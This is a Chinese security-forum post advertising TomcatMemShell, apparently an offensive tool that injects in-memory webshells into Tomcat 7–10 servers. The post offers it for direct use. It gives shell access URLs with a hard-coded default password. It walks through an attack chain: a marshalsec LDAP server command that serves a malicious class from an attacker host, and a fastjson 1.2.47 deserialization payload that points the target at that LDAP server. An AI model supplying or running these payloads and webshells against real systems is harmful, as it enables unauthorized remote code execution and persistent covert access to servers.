安全矩阵

 找回密码
 立即注册
搜索
查看: 2603|回复: 0

拿来即用的内存马 -- TomcatMemShell

[复制链接]

65

主题

65

帖子

241

积分

中级会员

Rank: 3Rank: 3

积分
241
发表于 2022-5-8 14:40:29 | 显示全部楼层 |阅读模式
拿来即用的内存马 -- TomcatMemShell (qq.com)


一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。

二、使用方法

1、Listener型/Filter型:

  1. <div>CMD内存马URL:xx.xx.xx.xx/?chan=whoami</div><div>冰蝎内存马URL:xx.xx.xx.xx/     默认连接密码:goautomne</div>
复制代码


2、Servlet型:​​​​​​​

  1. <div>CMD内存马URL: xx.xx.xx.xx/p?chan=whoami</div><div>冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码:goautomne</div>
复制代码



三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

  1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102
复制代码



然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了​​​​​​​{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
        "autoCommit":true
    }
}


四、下载地址

1、通过项目地址下载

2、公众号后台回复:20220508





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 08:40 , Processed in 0.012388 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表